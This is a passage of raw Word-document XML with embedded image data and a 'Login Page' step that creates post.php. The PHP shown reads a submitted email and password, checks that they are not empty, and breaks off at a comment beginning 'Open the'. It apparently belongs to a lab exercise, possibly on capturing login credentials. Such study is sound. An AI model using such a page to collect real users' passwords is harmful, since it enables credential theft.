CiiigAooooAKKKKAPOdW/wCQpef9dn/9CNFGrf8AIUvP+uz/APoRoqQPRqKKKoAooooAKKKKACii&#10;igAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK&#10;ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA851b/kKXn/XZ/wD0I0Uat/yFLz/rs/8A&#10;6EaKkD0aiiiqAKKKKACiiigAooooAKKKKACiiigAT7615IfGGq2Fzd30WuS6ldrqz2iaCyxbGiX+&#10;5tTcv+/XrdVIdKsYbp7qKztobtvv3CRIjv8A8DoA8/h+Iuq3lxFbQLp80srROsybnSLcj/I/+18l&#10;XtB8SaveeLfD6z3cH9n6vbS3DW/lfcZf4Feu1hsLO2TbFbQQ7m3/ACRKnz/36f8AY4N0T+RHvi/1&#10;Xy/d/wBygDymz+Iuq6IjrfNBcxTy3nkTPud18p/kR6saV8Wr6/iiiaxg+1zzy2sCI335Yn+f7rv/&#10;AA16W9hbOu1raB0/uPElEOm2cOzyrOBNrb12RKlAHGeCviBeeIIdQnvrOO0t7eBrhcSozpt3fLtV&#10;2b+H/Zrn9N+Lup6xqkWn20Fp5s7b1mm/55bN/wBxXevVobO1tmlaCCOF5W3y+VEi7/8AfqGHSrGF&#10;1aKztoXT7rpAiUAcVrHxIns/BWj6vFBH9tv4nl+zv9z5fv8A33SqVn8V7q/0iXU4l09E2/LYuzfa&#10;P4Pn/wB2vRXsLaaJIpbaB4l+dUeJHRKamlWKPuWztkd12b0gT7n9ygDzy/8AidfWEssSvpd55ECy&#10;74Wf/Stz7dkX+5VeH4tahf3Wj2dnBY/aLyKJ5d7P+4dpXSvTU02zT7Pss7ZPI/1WyJf3X+5/doTT&#10;bOGXdFZ2yOzb2dIk+/QB5jpXjPWvE8Wq+bqC6PFZQeayWMSvcNtd1+Xd8tbus3mvWHgnSvP1GC21&#10;iVkWeXzUi83/AGUZkdVb/gNdj/Ztnv3fY4PmXZ/ql+5Trm1gvLd4J4I5om+9FKu9K1hUjGpGUjGp&#10;GUo8p5To/wATLllWOOfzn3Lbtd6ntVVb/a2/K3+8n3q1tE+I2p6q9pI0Fp9neWCJvJ3fN5u751/7&#10;5rsNU8Nadq+nfYZ7VUt/l+S3/df+g1ZsNHsdKs4ra1to0hiXYvy16VTEYWUfdp+8ccaFeMviOO8R&#10;/EmfQp9UhWK2eW2u0gjR2+eVdm/dVa38d6jrfhbXpIpLRLq20+KeO7tPnRGZPu/7y13l/o9jqSyr&#10;c20btLF5TPt+fZ/v0WGjWOlWK2ltbRw2qrs2Kv3v97+9Wf1jDxpfw/eL9jX5vi908rT4o6roulWq&#10;eVb3kqN9l8p2b7Rv2r+9b/ZbdW/471TWbZ/DltbTX6T3kj/aU0VYPNf5N3y+f8tdx/Z9n5rS/ZoP&#10;NZdrP5a79v8AcqXyUdlZlXev3X2/dpTxNFyjKNMmOHqcvLKR5dffFG88OX8Ni8E94q/upftvlLcL&#10;Ls3/AD7X/wDQE21YvPiZqdmlgsCWGoyzr5rTW8qLEv3Plbc6/NXoj6ZZzXHny2cDy/8APV4l30z+&#10;ybHyki+w23lK29U8hdit/frT6xh/d/dB7Ct/z8PL0+Jep6RHqDN9nv8A/SZVW33fvYNu373+z81W&#10;pfirfxX11bbLBls4ml+1bm8q8+bbsi/2q9J/syz82WX7HB5sq7JX8pd7f79J/ZlnsiX7HbbIPmiT&#10;yl/df7v92j61h5f8ug+rV/8An6cF8H/GF94nsJYL7cksG5/9I/1sqb2+f/d/hr0aoktoIX3RQRI6&#10;fJvRalrixFSNWpKpCPKddGnKlT5ZS5gooormNgooooAKKKKACiiigAooooAKKKKACiiigDznVv8A&#10;kKXn/XZ//QjRRq3/ACFLz/rs/wD6EaKkD0aiiiqAKKKKACiiigAooooAKKKKACiiigAooooAKKKK&#10;ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA&#10;KKKKACiiigAooooAKKKKAPOdW/5Cl5/12f8A9CNFGrf8hS8/67P/AOhGipA9GoryT/hrr4Jf9Fb8&#10;E/8Ag8tf/i6P+Guvgl/0VvwT/wCDy1/+LqgPW6K8k/4a6+CX/RW/BP8A4PLX/wCLo/4a6+CX/RW/&#10;BP8A4PLX/wCLoA9boryT/hrr4Jf9Fb8E/wDg8tf/AIuj/hrr4Jf9Fb8E/wDg8tf/AIugD1uivJP+&#10;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&#10;JTACMvEigB0VSJlK4GXB/79Q/g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YmML5XEDAABsCAAADgAAAAAAAAAAAAAAAAA8AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAK&#10;AAAAAAAAACEAjIXBMyhHAAAoRwAAFQAAAAAAAAAAAAAAAADZBQAAZHJzL21lZGlhL2ltYWdlMS5q&#10;cGVnUEsBAi0AFAAGAAgAAAAhAOsN7DrgAAAACgEAAA8AAAAAAAAAAAAAAAAANE0AAGRycy9kb3du&#10;cmV2LnhtbFBLAQItABQABgAIAAAAIQBYYLMbugAAACIBAAAZAAAAAAAAAAAAAAAAAEFOAABkcnMv&#10;X3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfQEAADJPAAAAAA==&#10;">
                <v:shape id="Image 14" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:95;top:94;width:23533;height:2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svwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LqsIw&#10;EN0L/kMY4e40VS4XqUYRQRTEhU9cDs3YFpNJbaLWvzcXBHdzOM8ZTxtrxINqXzpW0O8lIIgzp0vO&#10;FRz2i+4QhA/IGo1jUvAiD9NJuzXGVLsnb+mxC7mIIexTVFCEUKVS+qwgi77nKuLIXVxtMURY51LX&#10;+Izh1shBkvxJiyXHhgIrmheUXXd3q+CWUyPNMSyWplrPN4Pl+TY7nZX66TSzEYhATfiKP+6VjvN/&#10;4f+XeICcvAEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAAAAAA&#10;AAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBy/1csvwAAANsAAAAPAAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;">
                  <v:imagedata r:id="rId16" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 15" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:23628;height:26448;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2362835,264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MGwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X/A9hBC9Fs4oW2RqlFQTZS6nV9jpsxk3oZrJuoq7/vikI3ubxPmex6lwtLtQG61nBeJSBIC69&#10;tlwp2H9thnMQISJrrD2TghsFWC17TwvMtb/yJ112sRIphEOOCkyMTS5lKA05DCPfECfu6FuHMcG2&#10;krrFawp3tZxk2Yt0aDk1GGxobaj83Z2dgun0dChuBZvnyftH+D7+WFOMrVKDfvf2CiJSFx/iu3ur&#10;0/wZ/P+SDpDLPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCMlJMGwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m,2644393r2362835,l2362835,,,,,2644393xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C06EF1F" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="510"/>
        </w:tabs>
        <w:spacing w:before="7" w:after="4"/>
        <w:ind w:left="510" w:hanging="150"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>file(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>post.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2110309C" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E52DB08" wp14:editId="0BA99D3F">
            <wp:extent cx="2891447" cy="218913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2891447" cy="2189130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05259AEE" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>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EB5502A" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="188"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD11B78" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D17BDFB" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>received</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E03BE5" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>($_SERVER['REQUEST_METHOD']</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>===</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>'POST')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F66A7BF" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="562"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Sanitize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>avoid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403DFF10" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="562"/>
      </w:pPr>
      <w:r>
        <w:t>$email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>htmlspecialchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>($_POST['email']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256ED6E4" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="562"/>
      </w:pPr>
      <w:r>
        <w:t>$password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>htmlspecialchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>($_POST['password']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836A6A5" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="562" w:right="5469"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>empty if (empty($email) || empty($password)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A3DC29" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="763" w:right="4975"/>
      </w:pPr>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"Error:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">required!"; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exit();}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5041F107" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="562"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
